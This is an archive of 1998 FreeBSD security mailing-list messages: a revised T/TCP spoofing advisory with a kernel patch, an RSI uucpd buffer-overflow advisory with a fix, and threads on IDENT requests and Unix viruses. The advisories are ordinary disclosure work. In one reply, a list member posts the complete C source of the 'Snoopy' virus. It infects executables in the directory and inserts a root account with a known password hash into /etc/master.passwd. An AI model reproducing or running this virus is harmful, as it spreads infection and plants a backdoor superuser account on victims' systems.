From owner-freebsd-security Sun May 17 12:56:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA07696 for freebsd-security-outgoing; Sun, 17 May 1998 12:56:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gvr.gvr.org (guido@gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA07573 for ; Sun, 17 May 1998 12:56:22 -0700 (PDT) (envelope-from guido@gvr.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id VAA03357; Sun, 17 May 1998 21:55:19 +0200 (MET DST) From: Guido van Rooij Message-Id: <199805171955.VAA03357@gvr.gvr.org> Subject: Re: Why aren't security fixes posted to security-announce? In-Reply-To: from Snob Art Genre at "May 14, 98 05:47:43 pm" To: ben@rosengart.com Date: Sun, 17 May 1998 21:55:19 +0200 (MET DST) Cc: avalon@coombs.anu.edu.au, fpscha@schapachnik.com.ar, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Snob Art Genre wrote: > On Thu, 14 May 1998, Guido van Rooij wrote: > > > Will arrive soon. I was just busy with the ttcp advisory. > > Speaking of which, what does your patch do? It makes sure that only those programs that explicitly set the TCP_NOPUSH option (and are this ttcp aware) will be able to get ttcp connections. The r-* services do not set this option and thus accelerated opens are not allow to the ports they listen() on. -Guido To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun May 17 13:02:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA08746 for freebsd-security-outgoing; Sun, 17 May 1998 13:02:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gvr.gvr.org (guido@gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA08670 for ; Sun, 17 May 1998 13:02:15 -0700 (PDT) (envelope-from guido@gvr.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id WAA03452; Sun, 17 May 1998 22:01:42 +0200 (MET DST) From: Guido van Rooij Message-Id: <199805172001.WAA03452@gvr.gvr.org> Subject: Re: Why aren't security fixes posted to security-announce? In-Reply-To: <199805151330.NAA30305@paranoid.eltex.spb.ru> from "ark@eltex.spb.ru" at "May 15, 98 01:30:19 pm" To: ark@eltex.spb.ru Date: Sun, 17 May 1998 22:01:42 +0200 (MET DST) Cc: avalon@coombs.anu.edu.au, eltex.spb.ru@gvr.gvr.org, fpscha@schapachnik.com.ar, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > > btw i've noticed that patches for 2.1 branch aren't posted anymore. > It is not hard (usually) to apply patches from 2.2 to 2.1 but sometimes > (i'd even say often) it has to be done manually. > > I am fully satisfied with 2.1.7.1 system and i do not want to upgrade. I will make a 2.1 patch and post an advisory update next monday. -Guido To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 18 08:56:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA02493 for freebsd-security-outgoing; Mon, 18 May 1998 08:56:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id IAA02456; Mon, 18 May 1998 08:56:07 -0700 (PDT) (envelope-from sysadmin@mfn.org) Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Mon, 18 May 1998 10:58:24 -0500 Received: by w3svcs.mfn.org with Microsoft Mail id <01BD824B.7FB9C100@w3svcs.mfn.org>; Mon, 18 May 1998 10:55:41 -0500 Message-ID: <01BD824B.7FB9C100@w3svcs.mfn.org> From: "J.A. Terranson" To: "'FreeBSD Security'" , "'FreeBSD Questions'" Subject: hub.freebsd.org IDENT requests Date: Mon, 18 May 1998 10:55:38 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk * Cross posted to freebsd-security * hub.freebsd.org (and *only* hub.freebsd.org!) attempts an IDENT sequence when talking to our mailservers - the port 113 kind. These are *always* rejected (but the mail still gets accepted [obviously]). Why does your machine do this, i.e., what protocol is it trying to exec? AFAIK, SMTP does not support 113 authentication (plz correct me if I am mistaken) Very Truly Yours, J.A. Terranson sysadmin@mfn.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 18 10:32:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA20233 for freebsd-security-outgoing; Mon, 18 May 1998 10:32:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from relay.ucb.crimea.ua (relay.ucb.crimea.ua [194.93.177.113]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA19727; Mon, 18 May 1998 10:30:07 -0700 (PDT) (envelope-from ru@ucb.crimea.ua) Received: (from ru@localhost) by relay.ucb.crimea.ua (8.8.8/8.8.8) id UAA15951; Mon, 18 May 1998 20:29:48 +0300 (EEST) (envelope-from ru) Message-ID: <19980518202948.A15917@ucb.crimea.ua> Date: Mon, 18 May 1998 20:29:48 +0300 From: Ruslan Ermilov To: "'FreeBSD Security'" , "'FreeBSD Questions'" Subject: Re: hub.freebsd.org IDENT requests Mail-Followup-To: 'FreeBSD Security' , 'FreeBSD Questions' References: <01BD824B.7FB9C100@w3svcs.mfn.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91i In-Reply-To: <01BD824B.7FB9C100@w3svcs.mfn.org>; from J.A. Terranson on Mon, May 18, 1998 at 10:55:38AM -0500 X-Operating-System: FreeBSD 2.2.6-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Mon, May 18, 1998 at 10:55:38AM -0500, J.A. Terranson wrote: > * Cross posted to freebsd-security * > > hub.freebsd.org (and *only* hub.freebsd.org!) attempts an IDENT > sequence when talking to our mailservers - the port 113 kind. These > are *always* rejected (but the mail still gets accepted [obviously]). > > Why does your machine do this, i.e., what protocol is it trying > to exec? AFAIK, SMTP does not support 113 authentication (plz correct > me if I am mistaken) SMTP does not, but sendmail does ;-) -- Ruslan Ermilov System Administrator ru@ucb.crimea.ua United Commercial Bank +380-652-247647 Simferopol, Crimea 2426679 ICQ Network, UIN To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 18 10:41:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA23064 for freebsd-security-outgoing; Mon, 18 May 1998 10:41:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gvr.gvr.org (guido@gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA22946; Mon, 18 May 1998 10:40:45 -0700 (PDT) (envelope-from security-officer@freebsd.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id TAA07658; Mon, 18 May 1998 19:40:41 +0200 (MET DST) Date: Mon, 18 May 1998 19:40:41 +0200 (MET DST) Message-Id: <199805181740.TAA07658@gvr.gvr.org> From: FreeBSD Security Officer To: undisclosed-recipients:; Subject: FreeBSD Security Advisory: FreeBSD-SA-98:03.ttcp REVISED Reply-To: security-officer@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- WARNING: The patch given in the original advisory had an error. You should apply the patch in this advisory. In order to do so, you should have the original file. If you do no longer have the original, look at ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:03/ttcp.orig It contains the original patch. You should then apply it first using patch with the -R option. We're sorry for any inconvenience this may cause. This advisory also contains a valid patch for FreeBSD 2.1.* versions. ============================================================================= FreeBSD-SA-98:03 Security Advisory FreeBSD, Inc. Topic: Problems with TTCP Category: core Module: kernel Announced: 1998-05-14, revised at 1998-05-18 Affects: FreeBSD 2.1.* FreeBSD 2.2.*, FreeBSD-2.2-stable before 1998/05/14 and FreeBSD-3.0-current before 1998/05/05 suffer from this problem. Corrected: FreeBSD-3.0-current as of 1998/05/14 FreeBSD-2.2-stable as of 1998/05/05 FreeBSD-2.1-stable as of 1998/05/18 FreeBSD only: No. Any other system incorporating TTCP extentions may be affected. Patches: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:03/ I. Background RFC 1644 provides an extension to TCP called TCP Extensions for Transactions, or shortly T/TCP. It provides a way of bypassing the standard three-way handshake found in TCP, thus speeding up transactions. T/TCP has been incorporated in FreeBSD since FreeBSD 2.0.5. II. Problem Description An accelerated open is initiated by a client by sending a new TCP option, called CC, to the server. The kernel keeps a special cache for each host it communicated with, among others containing the value of the last CC option used by the client. A new accelerated open is allowed when the CC sent is larger than the one in the per-host cache. Thus one can spoof complete connections. III. Impact The hole can be used to obtain unauthorized acces to the system by spoofing connections to the r*-services. This can only be done in the case where an .rhost file and/or a host.equiv file is used as the sole method of authentication. IV. Workaround Disable all r-* services. Note that setting the kernel variable net.inet.tcp.rfc1644 to 0 does not solve the problem. This variable controls whether the system will initiate rfc1644 based connections and does not affect the ability to receive such connections. V. Solution Apply the following patch, rebuild your kernel, install it and reboot your system. The patch is valid for 2.1.* systems, for 2.1-stable, for 2.2.* systems, for 2.2-stable and for 3.0-current. The patch below can be found on ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:03/ Index: tcp_input.c =================================================================== RCS file: /home/ncvs/src/sys/netinet/tcp_input.c,v retrieving revision 1.74 retrieving revision 1.77 diff -u -r1.74 -r1.77 --- tcp_input.c 1998/04/24 10:08:57 1.74 +++ tcp_input.c 1998/05/18 17:11:24 1.77 @@ -680,7 +680,9 @@ * - otherwise do a normal 3-way handshake. */ if ((to.to_flag & TOF_CC) != 0) { - if (taop->tao_cc != 0 && CC_GT(to.to_cc, taop->tao_cc)) { + if (((tp->t_flags & TF_NOPUSH) != 0) && + taop->tao_cc != 0 && CC_GT(to.to_cc, taop->tao_cc)) { + taop->tao_cc = to.to_cc; tp->t_state = TCPS_ESTABLISHED; ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org Security notifications: security-notifications@freebsd.org Security public discussion: freebsd-security@freebsd.org PGP Key: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ========================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBNWBwolUuHi5z0oilAQFXGwP9FhHKXkdktCGBQ3cfP4pHBmDHGFPwFL/E zcF05EFSxKR8Fw62b9zQw9vws1FN9L0ZXJjxVAFx7umSYnYqPrxFBgzzLs1Brfbh G4c+br73C9RsN6yyTo6Am7TxBiCFtRfneS91jZQGpNfZcFWx84oy5hhmTLXaaJK7 qIdrquhtTSo= =qxDF -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 18 13:09:14 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA19430 for freebsd-security-outgoing; Mon, 18 May 1998 13:09:14 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from puck.nether.net (root@puck.nether.net [204.42.254.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA18928 for ; Mon, 18 May 1998 13:07:50 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.0.Beta5/8.7.3) id PAA05756; Mon, 18 May 1998 15:13:39 -0400 Message-ID: <19980518151339.E3376@puck.nether.net> Date: Mon, 18 May 1998 15:13:39 -0400 From: Jared Mauch To: "J.A. Terranson" Cc: freebsd-security@FreeBSD.ORG Subject: Re: hub.freebsd.org IDENT requests References: <01BD824B.7FB9C100@w3svcs.mfn.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i In-Reply-To: <01BD824B.7FB9C100@w3svcs.mfn.org>; from J.A. Terranson on Mon, May 18, 1998 at 10:55:38AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk My favorite is this: May 18 01:47:59 puck sendmail[26336]: NOQUEUE: Null connection from hub.FreeBSD.ORG [204.216.27.18] May 18 09:02:21 puck sendmail[31482]: NOQUEUE: Null connection from hub.FreeBSD.ORG [204.216.27.18] I get these periodically. The only way you get these is if someone connects to your smtp port and then does a "QUIT" without doing anything else. - Jared On Mon, May 18, 1998 at 10:55:38AM -0500, J.A. Terranson wrote: > * Cross posted to freebsd-security * > > hub.freebsd.org (and *only* hub.freebsd.org!) attempts an IDENT > sequence when talking to our mailservers - the port 113 kind. These > are *always* rejected (but the mail still gets accepted [obviously]). > > Why does your machine do this, i.e., what protocol is it trying > to exec? AFAIK, SMTP does not support 113 authentication (plz correct > me if I am mistaken) > > > Very Truly Yours, > > J.A. Terranson > sysadmin@mfn.org > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message -- Work: jared@qual.net - We Make The Internet Work for Your Business 9-5pm(ET) 800 637 4424x2634 - 24x7 NOC - 800 424 3223 pgp key available via finger from jared@puck.nether.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 19 02:25:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA29311 for freebsd-security-outgoing; Tue, 19 May 1998 02:25:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from repsec.com ([208.225.192.249]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA29289 for ; Tue, 19 May 1998 02:24:52 -0700 (PDT) (envelope-from advise@repsec.com) Received: from localhost (advise@localhost) by repsec.com (9.0.1a/7.7.4.nospam) with SMTP id CAA14453; Tue, 19 May 1998 02:31:27 -0700 Date: Tue, 19 May 1998 02:31:27 -0700 (MST) From: RSI Advise To: Advise Account Subject: RSI.0002.05-18-98.BNU.UUCPD Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk RSI.0002.05-18-98.BNU.UUCPD |::::. |:::::: |:::::. |:::::: |:::::: |:::::. |.. :: |.. |.. :: |.. |.. |.. :: |::::: |::::: |::::: :::::: |:::::: |::::: |:: |:: :: |:: |:: |:: |:: |:: :: |:: :: |:::::: |:: |:::::: |:::::: |:::::: Repent Security Incorporated, RSI [ http://www.repsec.com ] *** RSI ALERT ADVISORY *** --- [CREDIT] -------------------------------------------------------------- Vulnerability found by: Matt Conover Notes: This advisory has been brought to you by WSD; RSI's official research & development team. Webpage: http://www.w00w00.org Authors: Matt Conover & Mark Zielinski --- [SUMMARY] ------------------------------------------------------------- Announced: April 21, 1998 Report code: RSI.0002.05-18-98.BNU.UUCPD Report title: BNU uucpd Vulnerability: Insufficient bounds checking Vendor status: NetBSD: Contacted, patch information below OpenBSD: Contacted, patch information below Solaris: Contacted, awaiting patch information Patch status: Patch available for certain Operating Systems at the end of this advisory Platforms: OSF 1.0, 2.0, SunOS 4.1.3, 4.1.4 Solaris 2.2, 2.3, 2.4, 2.5.1 NetBSD 1.3, 1.3.1 OpenBSD 2.1, 2.2 Not affected: FreeBSD 2.x BSDi 2.x, 3.x RedHat Linux 4.x, 5.x Slackware Linux 3.x Reference: http://www.repsec.com/advisories.html Impact: If exploited, an attacker could locally compromise root on your system. --- [DETAILS] ------------------------------------------------------------- Problem: Upon successfully logging into a system with uucpd, the daemon will attempt to record wtmp information. However, due to insufficient bounds checking, a buffer overflow can result when uucpd attempts to copy the connecting hostname into a buffer with a predefined size. While overwriting the buffer, the attacker can manipulate the stack and execute their own commands, possibly gaining root access into the system. The attacker must have an account on the system, which will allow this to be exploited. This problem is present in BNU uucpd. This is not installed by default on every operating system. This also may not always run as root. Known vulnerable Operating Systems include: OSF 1.0, 2.0, SunOS 4.1.3, 4.1.4 Solaris 2.2, 2.3, 2.4, 2.5.1 NetBSD 1.3, 1.3.1 OpenBSD 2.1, 2.2 Operating Systems not vulnerable: FreeBSD 2.x BSDi 2.x, 3.x RedHat Linux 4.x, 5.x Slackware Linux 3.x For more information on this type of attack, point your web browsers to http://www.repsec.com/bofs.html. --- [FIX] ----------------------------------------------------------------- Solution: A generic patch has been made publically available by the RSI staff. --- [PATCH] --------------------------------------------------------------- Solution: Apply the following patch to uucpd.c: --- uucpd.old.c Thu Feb 6 06:34:45 1997 +++ uucpd.c Tue Apr 7 16:37:46 1998 @@ -300,7 +300,8 @@ time(&ll.ll_time); lseek(f, pw->pw_uid * sizeof(struct lastlog), 0); - strcpy(line, remotehost); + strncpy(line, remotehost, sizeof(line)-1); SCPYN(ll.ll_line, line); SCPYN(ll.ll_host, remotehost); (void) write(f, (char *) &ll, sizeof ll); For NetBSD's patch please refer to: http://www.repsec.com/advisory/0002.patch.html --------------------------------------------------------------------------- Repent Security Incorporated (RSI) advise@repsec.com 13610 N. Scottsdale Rd. Suite #10-326 Scottsdale, AZ 85254 [ http://www.repsec.com ] --------------------------------------------------------------------------- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzU6dqAAAAEEAOHt9a5vevjD8ZjsEmncEbFp2U7aeqvPTcF/8FJMilgOVp75 dshXvZixHsYU7flgCNzA7wLIQPWBQBrweLG6dx9gE9e5Ca6yAJxZg8wNsi06tZfP nvmvf6F/7xoWS5Ei4k3YKuzscxlyePNNKws6uUe2ZmwVoB+i3HHT44dOafMhAAUT tBpSZXBTZWMgPGFkdmlzZUByZXBzZWMuY29tPg== =ro8H -----END PGP PUBLIC KEY BLOCK----- Copyright May 1998 RepSec, Inc. The information in this document is provided as a service to customers of RepSec, Inc. Neither RepSec, Inc., nor any of it's employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process contained herein, or represents that its use would not infringe any privately owned rights. Reference herein to any specific commercial products, process, or services by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by RepSec, Inc. The views and opinions of authors express herein do no necessarily state or reflect those of RepSec, Inc., and may not be used for advertising or product endorsement purposes. The material in this alert advisory may be reproduced and distributed, without permission, in whole or in part, by other security incident response teams (both commercial and non-commercial), provided the above copyright is kept intact and due credit is given to RepSec, Inc. This alert advisory may be reproduced and distributed, without permission, in its entirety only, by any person provided such reproduction and/or distribution is performed for non-commercial purposes and with the intent of increasing the awareness of the Internet community. --------------------------------------------------------------------------- RepSec, Inc. are trademarks of RepSec, Inc. All other trademarks are property of their respective holders. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 20 09:49:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA29036 for freebsd-security-outgoing; Wed, 20 May 1998 09:49:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ELR17.ateng.az.honeywell.com (elr17.ateng.az.Honeywell.COM [129.239.169.43]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA29008 for ; Wed, 20 May 1998 09:48:55 -0700 (PDT) (envelope-from egravel@elr346.ateng.az.honeywell.com) Received: from elr346.ateng.az.honeywell.com by elr346.ateng.az.honeywell.com with SMTP; Wed, 20 May 1998 9:48:13 -0700 Message-ID: <3562A6DB.3412BC8B@elr346.ateng.az.honeywell.com> Date: Wed, 20 May 1998 09:48:11 -0700 From: Emmanuel Gravel Organization: Honeywell X-Mailer: Mozilla 3.03Gold (X11; I; OpenVMS V6.1 VAXstation 4000-90) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Virus on FreeBSD Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk I haven't heard of a virus made for a Unix-like OS before, but I'm wondering if this can be an issue with FreeBSD (or Linux for that matter). I'm saying this since they both run on the most common platform there is today, the PC. I know most virii were writen for DOS-like OS's, but it's my impression that the common point between both machines is the hardware. Can anyone either clear this for me, or point me in the right direction for some info? Thanks! Emmanuel Gravel egravel@elr346.ateng.az.honeywell.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 20 11:19:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA17687 for freebsd-security-outgoing; Wed, 20 May 1998 11:19:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from portal.eltex.spb.ru ([195.19.195.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA17618 for ; Wed, 20 May 1998 11:18:50 -0700 (PDT) (envelope-from ark@eltex.spb.ru) From: ark@eltex.spb.ru Received: from paranoid.eltex.spb.ru (border1.eltex.spb.ru [194.58.218.11] (may be forged)) by portal.eltex.spb.ru (8.8.8/8.8.8) with ESMTP id WAA00364; Wed, 20 May 1998 22:14:57 +0400 (MSD) Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id WAA09218; Wed, 20 May 1998 22:19:44 GMT Date: Wed, 20 May 1998 22:19:44 GMT Message-Id: <199805202219.WAA09218@paranoid.eltex.spb.ru> In-Reply-To: <3562A6DB.3412BC8B@elr346.ateng.az.honeywell.com> from "Emmanuel Gravel " Organization: "Klingon Imperial Intelligence Service" Subject: Re: Virus on FreeBSD To: egravel@elr346.ateng.az.honeywell.com Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Emmanuel Gravel said : > I haven't heard of a virus made for a Unix-like OS before, but I'm > wondering if this can be an issue with FreeBSD (or Linux for that > matter). I'm saying this since they both run on the most common > platform there is today, the PC. I know most virii were writen for > DOS-like OS's, but it's my impression that the common point between > both machines is the hardware. > > Can anyone either clear this for me, or point me in the right direction > for some info? > > Thanks! - --- /* The Snoopy Virus for BSD Free Unix 2.0.2 (and others) */ /* (C) 1995 American Eagle Publications, Inc. All rights reserved! */ /* Compile with Gnu C, "gcc snoopy.c" */ #include #include #include #include DIR *dirp; /* directory search structure */ struct dirent *dp; /* directory entry record */ struct stat st; /* file status record */ int stst; /* status call status */ FILE *host,*virus, *pwf; /* host and virus files. */ long FileID; /* 1st 4 bytes of host */ char buf[512]; /* buffer for disk reads/writes */ char *lc,*ld; /* used to search for X23 */ size_t amt_read,hst_size; /* amount read from file, host size */ size_t vir_size=13264; /* size of X23, in bytes */ char dirname[10]; /* subdir where X23 stores itself */ char hst[512]; /* snoopy super user entry for the password file, pw='A Snoopy Dog.' */ char snoopy[]="snoopy:$1$LOARloMh$fmBvM4NKD2lcLvjhN5GjF.:0:0::0:0:Nobody:/root:"; void readline() { lc=&buf[1]; buf[0]=0; while (*(lc-1)!=10) { fread(lc,1,1,pwf); lc++; } } void writeline() { lc=&buf[1]; while (*(lc-1)!=10) { fwrite(lc,1,1,host); lc++; } } int main(argc, argv, envp) int argc; char *argv[], *envp[]; { strcpy((char *)&dirname,"./\005"); /* set up host directory name */ dirp=opendir("."); /* begin directory search */ while ((dp=readdir(dirp))!=NULL) { /* have a file, check it out */ if ((stst=stat((const char *)&dp->d_name,&st))==0) { /* get status */ lc=(char *)&dp->d_name; while (*lc!=0) lc++; lc=lc-3; /* lc points to last 3 chars in file name */ if ((!((*lc=='X')&&(*(lc+1)=='2')&&(*(lc+2)=='3'))) /* "X23"? */ &&(st.st_mode&S_IXUSR!=0)) { /* and executable? */ strcpy((char *)&buf,(char *)&dirname); strcat((char *)&buf,"/"); strcat((char *)&buf,(char *)&dp->d_name); /* see if X23 file */ strcat((char *)&buf,".X23"); /* exists already */ if ((host=fopen((char *)&buf,"r"))!=NULL) fclose(host); else { /* no it doesn't - infect! */ host=fopen((char *)&dp->d_name,"r"); fseek(host,0L,SEEK_END); /* determine host size */ hst_size=ftell(host); fclose(host); if (hst_size>=vir_size) { /* host must be large than virus */ mkdir((char *)&dirname,S_IRWXU|S_IRWXG|S_IRWXO); rename((char *)&dp->d_name,(char *)&buf); /* rename host */ if ((virus=fopen(argv[0],"r"))!=NULL) { if ((host=fopen((char *)&dp->d_name,"w"))!=NULL) { while (!feof(virus)) { /* and copy virus to orig */ amt_read=512; /* host name */ amt_read=fread(&buf,1,amt_read,virus); fwrite(&buf,1,amt_read,host); hst_size=hst_size-amt_read; } fwrite(&buf,1,hst_size,host); fclose(host); chmod((char *)&dp->d_name,S_IRWXU|S_IRWXG|S_IRWXO); strcpy((char *)&buf,(char *)&dirname); strcpy((char *)&buf,"/"); strcat((char *)&buf,(char *)&dp->d_name); chmod((char *)&buf,S_IRWXU|S_IRWXG|S_IRWXO); } else rename((char *)&buf,(char *)&dp->d_name); fclose(virus); /* infection process complete */ } /* for this file */ else rename((char *)&buf,(char *)&dp->d_name); } } } } } (void)closedir(dirp); /* infection process complete for this dir */ /* now see if we can get at the password file */ if ((pwf=fopen("/etc/master.passwd","r+"))!=NULL) { host=fopen("/etc/mast.pw","w"); /* temporary file */ stst=0; while (!feof(pwf)) { readline(); /* scan the file for user "snoopy" */ lc=&buf[1]; if ((*lc=='s')&&(*(lc+1)=='n')&&(*(lc+2)=='o')&&(*(lc+3)=='o')&& (*(lc+4)=='p')&&(*(lc+5)=='y')) stst=1; writeline(); } if (stst==0) { /* if no "snoopy" found */ strcpy((char *)&buf[1],(char *)&snoopy); /* add it! */ lc=&buf[1]; while (*lc!=0) lc++; *lc=10; writeline(); } fclose(host); fclose(pwf); rename("/etc/mast.pw","/etc/master.passwd"); /* update master.passwd */ } strcpy((char *)&buf,argv[0]); /* the host is this program's name */ lc=(char *)&buf; /* find end of directory path */ while (*lc!=0) lc++; while (*lc!='/') lc--; *lc=0; lc++; strcpy((char *)&hst,(char *)&buf); ld=(char *)&dirname+1; /* insert the ^E directory */ strcat((char *)&hst,(char *)ld); /* and put file name on the end */ strcat((char *)&hst,"/"); strcat((char *)&hst,(char *)lc); strcat((char *)&hst,".X23"); /* with an X23 tacked on */ execve((char *)&hst,argv,envp); /* execute this program's host */ } - --- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNWNW/6H/mIJW9LeBAQG/8AP9Gpmk+S3guD8o94GC6DgtyMj/NUSzcCSI oOo62VKZDSXDr6fPbmKq8gv/lKYo4IdJVXVa/q/xrN2ZciO+CdF6byDq+0D+4pjh isVSfdePAtbIVI+96x0TlLBnGcv0njkfiZ5PbWCa4QZd5Mr+DYoztCSQK+kXZ1k3 4DjolrZGoB4= =261h -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 20 11:52:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA26111 for freebsd-security-outgoing; Wed, 20 May 1998 11:52:05 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA26001 for ; Wed, 20 May 1998 11:51:28 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost (benedict@localhost) by echonyc.com (8.8.7/8.8.7) with SMTP id OAA16977; Wed, 20 May 1998 14:51:13 -0400 (EDT) Date: Wed, 20 May 1998 14:51:12 -0400 (EDT) From: Snob Art Genre Reply-To: ben@rosengart.com To: Emmanuel Gravel cc: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: <3562A6DB.3412BC8B@elr346.ateng.az.honeywell.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk It is possible to have viruses on Unix-like platforms, but their activities are constrained by the multiuser features of the OS. DOS/Win* viruses will not work on FreeBSD or Linux. On Wed, 20 May 1998, Emmanuel Gravel wrote: > I haven't heard of a virus made for a Unix-like OS before, but I'm > wondering if this can be an issue with FreeBSD (or Linux for that > matter). I'm saying this since they both run on the most common > platform there is today, the PC. I know most virii were writen for > DOS-like OS's, but it's my impression that the common point between > both machines is the hardware. > > Can anyone either clear this for me, or point me in the right direction > for some info? > > Thanks! > > Emmanuel Gravel > egravel@elr346.ateng.az.honeywell.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to 